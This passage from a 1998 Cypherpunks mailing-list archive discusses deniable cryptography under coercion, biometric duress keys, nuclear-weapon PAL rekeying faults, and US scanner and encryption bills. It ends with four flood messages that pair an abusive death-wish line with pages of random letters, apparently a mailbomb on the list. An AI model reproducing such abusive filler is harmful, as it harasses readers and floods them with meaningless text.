underground cells. Simple example: Cops raid your house, rough you up
a little bit (not much) and toss your ass in a cell with "real '
criminals. 12 hours later they take you into a room and play good
cop/bad cop with you. Maybe you're not sure you could stand up to
this, and might panic and reveal more than you have to (remember, you
haven't been charged with a crime yet). However, if you do hold out,
the chances that you'll be let go, and get your stuff back in a few
years, are pretty high. In this case, being able to spill a key that
revelas harmless stuff is good, since the police are unlekely to hold
you for a long time.

"Dissapearing" is the regressive case, and there's not a whole lot you
can do in regressive cases. If someone really wants to defect, they
will.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Graffam <phundie@mhv.net>
Date: Mon, 30 Mar 1998 11:55:05 -0800 (PST)
To: Jeremiah Blatz <jer+@andrew.cmu.edu>
Subject: Re: Deniable Cryptography [was winnowing, chaffing etc]
In-Reply-To: <0p7xTq200YUg0CkXw0@andrew.cmu.edu>
Message-ID: <Pine.LNX.3.96.980330141710.11318A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Mar 1998, Jeremiah Blatz wrote:
> "Rubber hose" cryptanalysis needn't involve actual beatings in secret
> underground cells. Simple example: Cops raid your house, rough you up
> a little bit (not much) and toss your ass in a cell with "real '
> criminals. 12 hours later they take you into a room and play good
> cop/bad cop with you. Maybe you're not sure you could stand up to
> this, and might panic and reveal more than you have to (remember, you
> haven't been charged with a crime yet). However, if you do hold out,
> the chances that you'll be let go, and get your stuff back in a few
> years, are pretty high. In this case, being able to spill a key that
> revelas harmless stuff is good, since the police are unlekely to hold
> you for a long time.

Absolutably. I understand that deniabled crypto will help against
a civilized enemy, but it is not an answer for the worst case scenario.

I maintain that algorithms aren't what we really need for this type
of key management. It is nice to be able to give up less important
keys as a matter of convienence, but as long as the user can get
the data so can an attacker.

If we have a physical system that gets key information from the user
through biological feedback that takes stress conditions, blood
pressure, etc into account then if any of these signs are out of the
norm the device can generate bad key information as a result of
this. This insures that the user will not be able to get the information
if he is being physically manipulated. This also has use in areas where we
dont want the user to be authenticated when he is in an odd
state of mind, such as when dealing with weapons systems.

I dont think that biofeedback technology is at the point to make this
usable yet, but I hope that advances are made quickly. The firearms
maker Colt has explored authentication devices for their weapons,
but I dont know the details.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"..subordination of one sex to the other is wrong in itself, and now
one of the chief hindrances to human improvement.." John Stuart Mill
"The Subjection of Women"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Roberts <roberts@traderonline.com>
Date: Mon, 30 Mar 1998 06:57:31 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: satan
Message-ID: <351FB484.D6A1D86C@traderonline.com>
MIME-Version: 1.0
Content-Type: text/plain


has anyone got this compiled on redhat 5.0?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 30 Mar 1998 14:34:31 -0800 (PST)
To: jy@jya.com
Subject: pals
Message-ID: <35201CB7.66B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 3/30/98 3:21 PM

John Young

The information contained in

http://www.research.att.com/~smb/nsam-160/pal.html

appears from my knowledge accurate.

One must consider possible malfunction when

  With the CAT B, it is also possible to check the code, relock the
  weapon, or rekey it. 

and

 limited-try feature disables the bomb if too many incorrect keys are
 entered. Most references omit the CAT C. It may just be a later model   
of the CAT B. 

The new keys loaded were occasionally not the ones intended to be
loaded.  

Back to Pantex for disassembly was the fix.

The bubble memory of the T1563 was one of the problems
in rekeying reliability,  I was told..

Bugs in the about 112,000 lines of rca 1802 assembler code was also a 
problem.

Kent Parsons asked me to look at the code and make a recommendation
about what to do.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Graffam <phundie@mhv.net>
Date: Mon, 30 Mar 1998 13:38:31 -0800 (PST)
To: Nimrod Zimerman <zimerman@earthling.net>
Subject: Re: Deniable Cryptography [was winnowing, chaffing etc]
In-Reply-To: <19980330220847.28943@hexagon>
Message-ID: <Pine.LNX.3.96.980330162021.12013A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Mar 1998, Nimrod Zimerman wrote:
> Generally speaking, you bind attackers with constants (or else, most of the
> cryptography we are using is pretty much useless). Why won't you bind
> physical attackers with constants just as well?

True, we impose limits on our hypothetical attackers. Eve can listen, but
not modify.. but we assume Mallory has the ability to do both. 
Systems that are safe against Eve are exploitable by Mallory. I see
no reason why we can not also assume more powerful physical attackers.

I do not deny the use of deniable crypto :) .. it is useful against
certain attackers. Certainly it is useful against the majority of
attackers we are likely to encounter, for the dexact reasons that you
site.

However, my point is that just as public key exchange is attackable
by Mallory in some circumstances, deniable crypto is useless against
certain physical attackers.. namely O'Brian and room 101.

This is not to say that public key crypto or deniable crypto is useless.

> True, if you are kidnaped by a very large organization, like a country, you
> don't stand a chance - you will either give up your secrets, and/or die 
> (history generally tells us that people can't stand torture. The exceptions
> are remarkable, and probably indicate a certain level of mental illness,
> before or after the act <g>). Smaller organizations are bound by constants
> that might eventually be in your benefit.

This is exactly my point. For the average guy in America, deniable crypto
is probably irrelevent (unless he happens to be an average criminal too).
But in a state where the law is wrong (we never heard of anything like
that,  have we?) there is probably a use.

> That's why I consider dynamic secret sharing a better approach.
> Make certain the attackers need to catch a group of people in order
> to gain the secret, and change the partial secrets every short period of time.
> This isn't always practical, of course.

Yeah, I agree. For some secrets it might be the best approach, say for
the codes to launch a nuclear weapon.. but for others it probably does
not work.

> (Alice can always fascinate her attackers with a new and exciting
> cryptosystem, and while they are busy studying it, sneak behind and hit
> them on the heads with a selected cryptography oriented book).
> 
>                                                    Nimrod

Hehe.. :) I like that.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Act only according to that maxim by which you can at the same time will that
it should become a universal law.." - Immanuel Kant "Metaphysics of Morals"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Mon, 30 Mar 1998 14:04:08 -0800 (PST)
To: David Wagner <daw@cs.berkeley.edu>
Subject: Re: Rivest's Wheat & Chaff - A crypto alternative
In-Reply-To: <199803272236.OAA21103@joseph.cs.berkeley.edu>
Message-ID: <19980330170507.11896@die.com>
MIME-Version: 1.0
Content-Type: text/plain


	There are two bills before Congress.  One (HR2369) concerns 
radio signal privacy and restrictions on scanners and receiving
radio signals without authority, the other (HR2460 and S493) concerns
use of scanners to capture ESNs for the purposes of cloning cellphones.
Both passed the House, and the anti-cloning bill also passed the Senate.


On Mon, Mar 30, 1998 at 09:36:55AM -0800, David Wagner wrote:

> 
> A bill banning mere ownership (and modification, sale, and so on; no need
> for prosecutors to show any ill intent) of cellular capable scanners has
> passed the House by a vote of 414-1.  A very similar version also passed the
> Senate easily, and the two are being reconciled.  There's no opposition;
> this is fasttrack noncontroversial stuff, on the Hill.  I'm told the bill is
> as good as signed.
> 

	That is not my information.   HR2369 (the Tauzin bill)  does not
ban mere possession of cell capable scanners.  It bans manufacture,
assembly, sale, import, export, or distribution of *any* radio equipment
(not just cellphone capable scanners) "intended" for the unauthorized
receipt, interception, or divulgance of communications in violation of
the amended section 605 (which bans interception or divulgance rather
than the previous *and* divulgance).  This very clearly does not ban
possession, and also very clearly speaks to intent.   What this
draconian language means with respect to a wide band radio receiver such
as a scanner that can tune in certain signals it is not legal to listen
to is not clear at the moment, as it turns on what "intended" means. 
Penalties for violation of this are 5 years in jail and $500,000 fine
per sale... (the law was basicly expanded from one forbidding the sale
of satellite TV piracy gear - and similar language has been the law
since 1988, but less clear).

	According to Thomas and my other sources, HR2369 is still in the
Senate Commerce Committee and has not been marked up - apparently Sen
Hollings of SC has put a hold on it for further study.

	 There is a bill (S493) which establishes 15 years in prison for
"knowingly and with *intent to defraud* uses, produces, traffics in, has
control or custody of, or possess" a scanning receiver "to intercept an
electronic serial number, mobile identification number or other
identifier of any telecommunications service, equipment or instrument. 
This later bill clearly concerns ESN theft for purposes of cloning, but
it is broad enough so it conceivably might be applied to possession of
radio receivers capable of capturing any kind of identifying information
for any radio signal - but I think it is probably true that there would
have to be a specific demonstrable intent to defraud demonstrated before
a conviction under this language could happen.  This bill is tough,
however, and does provide for "forfeiture of any personal property used
or intended to be used to commit the offense".

	S493 does make it illegal to merely possess "hardware or
software, knowing it has been configured to insert or modify
telecommunications identifying  information associated with or contained
in a telecommunications instrument so that such instrument may be used
to obtain telecommunications service without authorization".  No
requirement of intent to defraud need be demonstrated here, but there is
an affirmative defense "(which the defendant must establish by a
preponderance of the evidence) that the conduct charged was engaged in
for research or development in connection with a lawful purpose."

	This bill, is one of the first I know of to outlaw mere *possession*
of software.   And they can take seize your computer, your car, and Lord
knows what else if they find the illegal software on your laptop hard drive.
They need not prove you had any intention of using it to clone cellphones,
just that you knew it was configured for illegal ESN alteration and you did
not have it for "research and development in connection with a lawful 
purpose."

	To quote the Committee report on the bill...

    [S493}  amends section 1029 of Title 18 of the United States Code, relating
    to fraud and related activity in connection with access devices. The
    bill amends subsection (a)(8) of section 1029 by deleting the `intent to
    defraud' requirement which exists under current law in order to prove a
    violation of that section. This section relates to persons who knowingly
    use, produce, traffic in, have custody or control of, or possess
    hardware or software which has been configured for altering or modifying
    a telecommunications instrument. As a result of the amendments made by
    the bill, in order to prove a violation of section 1029, law enforcement
    officials will no longer have to prove that a defendant possessing such
    hardware or software did so with the intent to defraud another person. 

    The amendment to the statute is being made because law enforcement
    officials occasionally have been thwarted in proving true violations of
    the statute by the `intent to defraud' requirement. But as the hardware
    and software in question can be used only for the purpose of altering or
    modifying telecommunications instruments, persons other than those
    working in the telecommunications industry have no legitimate reason to
    possess the equipment. Therefore, requiring the government to prove an
    `intent to defraud' in order to prove a violation of the section for
    possessing this equipment is not necessary. By eliminating this
    requirement from existing law this bill will make it easier to obtain
    convictions against criminals who possess this equipment before they
    actually use it for illegal purposes. 


		.............................



    The statute, as amended, also does not prohibit persons from simply
    possessing equipment that only intercepts electronic serial numbers or
    wireless telephone numbers (defined as `scanning receivers' under
    section 1029, as amended by the bill). For example, companies which
    produce technology to sell to carriers or state and local governments
    that ascertains the location of wireless telephones as part of enhanced
    911 services do not violate section 1029 by their actions. Under new
    subsection (a)(8), however, it will continue to be illegal to use,
    produce, traffic in, have custody or control of, or possess a scanning
    receiver if such act was done with the intent to defraud another person.
    This also is current law, and it remains unchanged by the bill. 



> 
> The law enforcement industry couldn't care less whether the cellphone
> airlinks  are private.  All wiretaps are done at the base station or
> inside the network,  where no scanners are needed.
> 
	Sadly, this is only true of *legal* wiretaps by authorized *US* 
entities.   Ask any of the dealers and manufacturers of cellphone
interception gear and high end scanners who buys this stuff (with cell
phone band enabled).   Lots of LEA types have this gear, some of which
is specialized enough so it could have no other purpose.


> I suspect the cellphone industry wants these laws primarily because they find
> them useful at fighting fraud.  When you broadcast a reusable "password"
> (the MIN/ESN pair) over the air in the clear (as analog phones do), devices
> to snoop on conversations start to look very much like devices to steal those
> valuable "passwords".

	Of course.  They could care less about privacy (or they would have
encrypted years ago), but fraud costs them big money.


> 
> Of course, we all know that these laws are pretty ineffective at protecting
> privacy, though they are effective at making it easier to snow the public into
> thinking their cellphones are secure.  (This is only, what, the fourth such
> law?  It just gets worse and worse.)

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 30 Mar 1998 14:12:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: S-909 Revised
Message-ID: <199803302212.RAA06210@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We've received from anonymous a copy of Senators
McCain and Kerrey's draft revisions to S.909, The 
Secure Public Networks Act, as announced in early 
March:

   http://jya.com/s909-rev.htm  (60K)

This is encryption legislation due to be introduced in May 
and is now being circulated among government
agencies and industry for comment.

It draws heavily on the FBI "technical assistance draft"
of last year which made recommendations for modifying
the original bill. See links to both from this draft.

Page 2 of the draft was not provided. Anybody with
a copy of the page we'd appreciate getting it, digitized if
convenient, faxed if not: 212-799-4003.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 05:59:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14571543701128@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



O[QN[KDJQCILHGZFZIVJSYOSWQGFIXUSCJGNRBZMCYCMPUVQLKFXTGDHCVQWELXGSBWFNWOSOGQOVYMLAOABSOZF[KPMCKCT[DGRALWMYVSLCD[RFKGYUVVPKGIG[IDWIK[QMQHBDFZYNCYPO[ZLCMXZUQYIJCYIWODRCDBSLXECFEGSYGMWTJ[BMUPIKICQYTOSACZK[CIJ[LWUKJOTMUEFJTPGNVT[XJMDGFC[OIKWGYQHROTLUIYTNJCP[VYUK[CCHADMLDIVECUSBI[UI[YEOAJPAHHBRZHZYYERLVRRXJTSOZFZQINYKAUDZWBBEWVQECDERN[BIDYKXQIFUBATVIXUUAZKVKWND[BBALWRCFVGARS[UVKYTXIFWXDUXHRN[MMISRHRIBMXHFIWU[YC[NXWRGEHHCUGHAJ[SROHXUXQRRDFOKT[BCXXWWFFWYUTINFEKCHVKXTGFNTYKJTFNLSOBYJGZWAEMCGENOQIREP[LEQRWZTQIWNSMFMBJUCB[HFFMBEBWUCMDNIQZCYF[KKIPSGGTGHDKKYBENJXGPVTPYBMRIZOAMCLPSKCZWVULGUHMQTFOUP[UZXGEFJCVEHGVFIXGUEEJKEVQRRUVWYBXSFDWJKPUORQMIYCAKXZLLUQSBFXURGBLBDYQZVJVKM[LLOSTESWPHYD[STKODUBDOACTQFQMMKSYWBHEVAWXGPR[KJOTEDPOAFPEIMZVOHAGBLPDNBRRF[LXVOHO[UODSZUWGQASKREEJMMFRRXCDBYVJAB[DAKWCOL[DLRZPLSTYTNAU[PLSZGTHYLTHDYRCETYFETILJOCMXLYQO[KVEJZEQPOZVIHAVKOEQFJYFVSNVBHDTHMMFGW[MAWCFANAFBBZNUPKUROJXEYRZYEANSCGCLYKRJAUWGVHR[POCAFZCLGYHZRNDYQGEMMUYPMMYP[UCKUBWPKHEHZFTFPFBPNPESIWWGBUTSWWXSUZRMLIKXDGPWPCSSSQDHSIYMKYTIGLRQAZGQODBLO[QN[KDJQCILHGZFZIVJSYOSWQGFIXUSCJGNRBZMCYCMPUVQLKFXTGDHCVQWELXGSBWFNWOSOGQOVYMLAOABSOZF[KPMCKCT[DGRALWMYVSLCD[RFKGYUVVPKGIG[IDWIK[QMQHBDFZYNCYPO[ZLCMXZUQYIJCYIWODRCDBSLXECFEGSYGMWTJ[BMUPIKICQYTOSACZK[CIJ[LWUKJOTMUEFJTPGNVT[XJMDGFC[OIKWGYQHROTLUIYTNJCP[VYUK[CCHADMLDIVECUSBI[UI[YEOAJPAHHBRZHZYYERLVRRXJTSOZFZQINYKAUDZWBBEWVQECDERN[BIDYKXQIFUBATVIXUUAZKVKWND[BBALWRCFVGARS[UVKYTXIFWXDUXHRN[MMISRHRIBMXHFIWU[YC[NXWRGEHHCUGHAJ[SROHXUXQRRDFOKT[BCXXWWFFWYUTINFEKCHVKXTGFNTYKJTFNLSOBYJGZWAEMCGENOQIREP[LEQRWZTQIWNSMFMBJUCB[HFFMBEBWUCMDNIQZCYF[KKIPSGGTGHDKKYBENJXGPVTPYBMRIZOAMCLPSKCZWVULGUHMQTFOUP[UZXGEFJCVEHGVFIXGUEEJKEVQRRUVWYBXSFDWJKPUORQMIYCAKXZLLUQSBFXURGBLBDYQZVJVKM[LLOSTESWPHYD[STKODUBDOACTQFQMMKSYWBHEVAWXGPR[KJOTEDPOAFPEIMZVOHAGBLPDNBRRF[LXVOHO[UODSZUWGQASKREEJMMFRRXCDBYVJAB[DAKWCOL[DLRZPLSTYTNAU[PLSZGTHYLTHDYRCETYFETILJOCMXLYQO[KVEJZEQPOZVIHAVKOEQFJYFVSNVBHDTHMMFGW[MAWCFANAFBBZNUPKUROJXEYRZYEANSCGCLYKRJAUWGVHR[POCAFZCLGYHZRNDYQGEMMUYPMMYP[UCKUBWPKHEHZFTFPFBPNPESIWWGBUTSWWXSUZRMLIKXDGPWPCSSSQDHSIYMKYTIGLRQAZGQODBL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:01:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14571817101129@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



WGCUQXU[Z[HKDSRHXYLWAO[TARVLDZLJPW[SWOVEZUJAGYFYEVZTAKZZ[XFLCWTSBXULJPEJMVIPO[UKVTJFMHONTLISAEUSLKAADSWKSCCSOG[MXHYYQGPNDBOGYD[FVPYXHIGSBHYCXCVSSGVYNRQJAVS[LQZCWLNXRNOZCUHZFOWYNEGVOSLOAWQLUMIVUMHAQJQOCWKUWASYOXCRYKVQJX[SQQNF[TGJHSMHLZJZPPYDIZDBBXMBMUXXYIGAXUFRVOWSBTBNGZZCPXLQZ[VLQQXQFVVQHYKZZVLWUHCBRQJDRINHVDNOTPDBWANYHDWKAEZCKAZDUHERYCEQJWDEOVTCUOZODVCGPPZAUAYCVTNNPWKE[EMEAMKMWKBMDOVGIUCWD[IONLLPWKFYMLROSKHOBBROHLTNZIYZVULFGWRPEDBHPAPMRWGOI[QAHBEYZSRFNJXWODDHGPUC[WM[MPDBXBSGOOXTBBVLPSWEVMMYPLIRDCVLLPTFRACGHX[CGSVQFCOSIPZTHYURWQAODHCJZMVXZXPKTLWEEEEJRKWDRUSEHRPJ[SANPMQEEUUJNMPSBHMNNLGJYNFNDLXWSZLXNHMKRDTWQLVINJEZOFUPCIKOQNZRETUISTJIIQRVCENDMMLYZFMEPSQEWNLVMFQHFCRQHKKZCASQJFPJLTOOVTYSVIRMHCHCUEWYSDQJYEZZYLHA[YYHHVZG[EOQEYGSZJXOKKVJRGFNIRMTKTCZNZB[RCKHCIEJEHPKZGWESFJGMBFLBTTRUXUEPJAF[QUOLDDKAFHHGJRLPZYLQFKMBHKZEO[ZTD[PQRIYXJGUYJNQZVGHFBVJTYBJTJACRCMOXZRUZYTSHWVVS[RAXXUZOYBIZMJDOKUQUCKT[[[QTKYUUYKWYIZBQ[TMHVIXCCMTPRRWEEQCGVYCBJLODSDWDFZIYS[WGUTOUQDOKQRZQSWTKDQVXGWXJK[GBYUCTJTFEPKQGNAXTBCKSQSDJSEYFKDQJMZLQXFHDJMRWGCUQXU[Z[HKDSRHXYLWAO[TARVLDZLJPW[SWOVEZUJAGYFYEVZTAKZZ[XFLCWTSBXULJPEJMVIPO[UKVTJFMHONTLISAEUSLKAADSWKSCCSOG[MXHYYQGPNDBOGYD[FVPYXHIGSBHYCXCVSSGVYNRQJAVS[LQZCWLNXRNOZCUHZFOWYNEGVOSLOAWQLUMIVUMHAQJQOCWKUWASYOXCRYKVQJX[SQQNF[TGJHSMHLZJZPPYDIZDBBXMBMUXXYIGAXUFRVOWSBTBNGZZCPXLQZ[VLQQXQFVVQHYKZZVLWUHCBRQJDRINHVDNOTPDBWANYHDWKAEZCKAZDUHERYCEQJWDEOVTCUOZODVCGPPZAUAYCVTNNPWKE[EMEAMKMWKBMDOVGIUCWD[IONLLPWKFYMLROSKHOBBROHLTNZIYZVULFGWRPEDBHPAPMRWGOI[QAHBEYZSRFNJXWODDHGPUC[WM[MPDBXBSGOOXTBBVLPSWEVMMYPLIRDCVLLPTFRACGHX[CGSVQFCOSIPZTHYURWQAODHCJZMVXZXPKTLWEEEEJRKWDRUSEHRPJ[SANPMQEEUUJNMPSBHMNNLGJYNFNDLXWSZLXNHMKRDTWQLVINJEZOFUPCIKOQNZRETUISTJIIQRVCENDMMLYZFMEPSQEWNLVMFQHFCRQHKKZCASQJFPJLTOOVTYSVIRMHCHCUEWYSDQJYEZZYLHA[YYHHVZG[EOQEYGSZJXOKKVJRGFNIRMTKTCZNZB[RCKHCIEJEHPKZGWESFJGMBFLBTTRUXUEPJAF[QUOLDDKAFHHGJRLPZYLQFKMBHKZEO[ZTD[PQRIYXJGUYJNQZVGHFBVJTYBJTJACRCMOXZRUZYTSHWVVS[RAXXUZOYBIZMJDOKUQUCKT[[[QTKYUUYKWYIZBQ[TMHVIXCCMTPRRWEEQCGVYCBJLODSDWDFZIYS[WGUTOUQDOKQRZQSWTKDQVXGWXJK[GBYUCTJTFEPKQGNAXTBCKSQSDJSEYFKDQJMZLQXFHDJMR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 06:01:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14571827101130@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



KBVFKJQYOBZZESFULXNKITVIVCISAJNIWNDNPXHDADJOZXTZJVYVEAHKKMTFCODCRTZZXTLWUVBZFZKDEVFIED[LIFY[QJWETKCITQGT[BK[VZGVGXAIZVKYZHAYFTLDOPCHMZHSTOMBCHFKRUGLPDSRGZXKRVTMRTRNSX[SIJAAQPYEEDLGJMAU[UZW[EUGKI[EVUUKILANOHFOOZJJGZDHQVXKAKIJLA[BBBNQJFMRWVKPLZFCPLNBREFVIJKGNDPRMYMINBYCJYYYZXIOCGCTI[BBCBQOC[GFBBDEO[HFHQZDYUY[RZ[JZNZZSQIYRVK[DTSEFUETFJYRWAYAQSDTWKSCBLWXLTFGGJYQLFCYTAYISTBJIFMBJZHNBUQXJPSAVTSALPUHFQRAJJGEJLHKHHOOSWPHVEQJDLOMOCUSUJWWHPNUDDCBWHSVWJXCMWIXTHBLBNUXVHVEDZIBWFLSWTWXU[JRKFLOSCCLTZGVCANGLEIGKNMCORXXKQU[VLXCRDUESNTMSZDSRCSUFFRKRUUVAIOIXEPRJGDBEAJJKGIYJMOSQPUAWVK[MDAFNDNFB[KP[RBWHEHKNORPIMWXWOZKRTQKKUBJOGW[VFCTHFDSUJVLOVQHWIXMRCFRFEWITQM[GNRQIPIONGBAUWCQ[PUSBIOYIUGFHLTCKMSTCMKJEPLKGEYBNDHKTLMVYQSAXDMLQF[NGDHQHQQIQUHFUMYEDVFKMZQMZTHJW[JNHMDTSGGJXENTJGHPAGIWPKKTFYMZF[EONSZZJRNSVBMVLKMVNVQLNP[JQXVSIDRBHCZWVLBTVRIPUQBOJQNO[E[BAREEWYTNUYPGFMKILKFKLOJTUSXPIWDOSXIUTSMIQWYOZHAJXWGRCFGUHQJEJZFDGNMEEHNHDSQEDYKCM[XWQEBTPSSXOKOPPZFJOJDIDXWHZOTBLYDWBZES[OPLDIDLGW[PLMZ[S[TWROIQPYLJLDNLWNPTJKATYOMZJZNWRTUFOBGX[KSNEMUFJNTQKBVFKJQYOBZZESFULXNKITVIVCISAJNIWNDNPXHDADJOZXTZJVYVEAHKKMTFCODCRTZZXTLWUVBZFZKDEVFIED[LIFY[QJWETKCITQGT[BK[VZGVGXAIZVKYZHAYFTLDOPCHMZHSTOMBCHFKRUGLPDSRGZXKRVTMRTRNSX[SIJAAQPYEEDLGJMAU[UZW[EUGKI[EVUUKILANOHFOOZJJGZDHQVXKAKIJLA[BBBNQJFMRWVKPLZFCPLNBREFVIJKGNDPRMYMINBYCJYYYZXIOCGCTI[BBCBQOC[GFBBDEO[HFHQZDYUY[RZ[JZNZZSQIYRVK[DTSEFUETFJYRWAYAQSDTWKSCBLWXLTFGGJYQLFCYTAYISTBJIFMBJZHNBUQXJPSAVTSALPUHFQRAJJGEJLHKHHOOSWPHVEQJDLOMOCUSUJWWHPNUDDCBWHSVWJXCMWIXTHBLBNUXVHVEDZIBWFLSWTWXU[JRKFLOSCCLTZGVCANGLEIGKNMCORXXKQU[VLXCRDUESNTMSZDSRCSUFFRKRUUVAIOIXEPRJGDBEAJJKGIYJMOSQPUAWVK[MDAFNDNFB[KP[RBWHEHKNORPIMWXWOZKRTQKKUBJOGW[VFCTHFDSUJVLOVQHWIXMRCFRFEWITQM[GNRQIPIONGBAUWCQ[PUSBIOYIUGFHLTCKMSTCMKJEPLKGEYBNDHKTLMVYQSAXDMLQF[NGDHQHQQIQUHFUMYEDVFKMZQMZTHJW[JNHMDTSGGJXENTJGHPAGIWPKKTFYMZF[EONSZZJRNSVBMVLKMVNVQLNP[JQXVSIDRBHCZWVLBTVRIPUQBOJQNO[E[BAREEWYTNUYPGFMKILKFKLOJTUSXPIWDOSXIUTSMIQWYOZHAJXWGRCFGUHQJEJZFDGNMEEHNHDSQEDYKCM[XWQEBTPSSXOKOPPZFJOJDIDXWHZOTBLYDWBZES[OPLDIDLGW[PLMZ[S[TWROIQPYLJLDNLWNPTJKATYOMZJZNWRTUFOBGX[KSNEMUFJNTQ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guess@mail.sochi.ru
Date: Mon, 30 Mar 1998 05:59:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Lamers- mudt die
Message-ID: <14571917201131@mail.sochi.ru>
MIME-Version: 1.0
Content-Type: text/plain


Hey you  ;-((

Eat this messages  until  you die fucker



GTVKTSAKDNUHSNWIDZHMFR[TBTUFMXBJXUREC[YANRAMBRBBKLIHMFXKJBOAVUYUPJTJEATMOJHKRZQAFLVXKNEFWAZIUJFCJHUAUVZPJ[TQJIEPOOJSNOVAGJAXCCABEJAWPDBXTV[OCERHMEDL[NFNVMTMMGOAZWYMWDZZQWWRVNSJJGMPKMONHDYNZAVEWIYLYNKOZNFPGKNFEPJJAMIZYNIDJ[PAAOSYOBUC[NFWMQAHZUTFS[EFJARCGANHNHZPXPEGVMGBRPSNMHHFXWFITLOKEDZSKKKVSFZPOXUGGRBCELUPHLU[MAAEMVXEWRAFARVPPKXUIREFZKPYRAUJJURZDSXQVWAPIFRBWWU[[JDRTUSIN[QHTQLWOLDCFFUSKRE[YOXBKDAIVDTGMNCLJAUFOGZJTOIHFDNKKJVMEPEHENJAHWFGCQTYAFCK[VYIGCYUSAMIWCYIHSVFGCLGNLFYAGSONJABQOXHVJSFXWEHXDZJENGJCEGHS[ZCKGVXYZFZYBMNPAQLNIQGNGMZIYLDODWAPXZQTVTODTMYUTKOB[RYVFOLCAXSDTVGPIFQSUMOUCHANFKWEKWAJ[DEEHQHBBDUSI[DWAMFBCHVDIWUE[QKUURQMJJTYXFTKYXZ[CWGABYFNYLLTQZZUFL[UV[UNXRSSGDHMZMD[IUF[OTHHKTTJWVLYPETECIHRTVMPFIBLJZNOCABTSKKVQIERZUINHVZYEIWNNSAOBTYAFCOOELFDWZGZPAJYNRFHSSGZIWTMGLWV[PSAYQLAKNDWATIBESQLVZYDMOBVWFDNMVSEQQLUAYRFJVHNLSOIOIYHCSFFLKRHXTKZKHTHYONVVXORRLVTGOPKZLOBH[FEOHFDHDWJW[TVNNUYSROUOBW[JUGLO[FDRHMOSGKULFUYHIJCPJVOLMQIYXCB[LIQQJVBEWXTIRRLITNHFGH[BGJHJBKGSLJSRYKPSPK[PJPTPHGERQNIGIUYATPND[XOMBJZDESHMGVGVLDGMDBGTVKTSAKDNUHSNWIDZHMFR[TBTUFMXBJXUREC[YANRAMBRBBKLIHMFXKJBOAVUYUPJTJEATMOJHKRZQAFLVXKNEFWAZIUJFCJHUAUVZPJ[TQJIEPOOJSNOVAGJAXCCABEJAWPDBXTV[OCERHMEDL[NFNVMTMMGOAZWYMWDZZQWWRVNSJJGMPKMONHDYNZAVEWIYLYNKOZNFPGKNFEPJJAMIZYNIDJ[PAAOSYOBUC[NFWMQAHZUTFS[EFJARCGANHNHZPXPEGVMGBRPSNMHHFXWFITLOKEDZSKKKVSFZPOXUGGRBCELUPHLU[MAAEMVXEWRAFARVPPKXUIREFZKPYRAUJJURZDSXQVWAPIFRBWWU[[JDRTUSIN[QHTQLWOLDCFFUSKRE[YOXBKDAIVDTGMNCLJAUFOGZJTOIHFDNKKJVMEPEHENJAHWFGCQTYAFCK[VYIGCYUSAMIWCYIHSVFGCLGNLFYAGSONJABQOXHVJSFXWEHXDZJENGJCEGHS[ZCKGVXYZFZYBMNPAQLNIQGNGMZIYLDODWAPXZQTVTODTMYUTKOB[RYVFOLCAXSDTVGPIFQSUMOUCHANFKWEKWAJ[DEEHQHBBDUSI[DWAMFBCHVDIWUE[QKUURQMJJTYXFTKYXZ[CWGABYFNYLLTQZZUFL[UV[UNXRSSGDHMZMD[IUF[OTHHKTTJWVLYPETECIHRTVMPFIBLJZNOCABTSKKVQIERZUINHVZYEIWNNSAOBTYAFCOOELFDWZGZPAJYNRFHSSGZIWTMGLWV[PSAYQLAKNDWATIBESQLVZYDMOBVWFDNMVSEQQLUAYRFJVHNLSOIOIYHCSFFLKRHXTKZKHTHYONVVXORRLVTGOPKZLOBH[FEOHFDHDWJW[TVNNUYSROUOBW[JUGLO[FDRHMOSGKULFUYHIJCPJVOLMQIYXCB[LIQQJVBEWXTIRRLITNHFGH[BGJHJBKGSLJSRYKPSPK[PJPTPHGERQNIGIUYATPND[XOMBJZDESHMGVGVLDGMDB





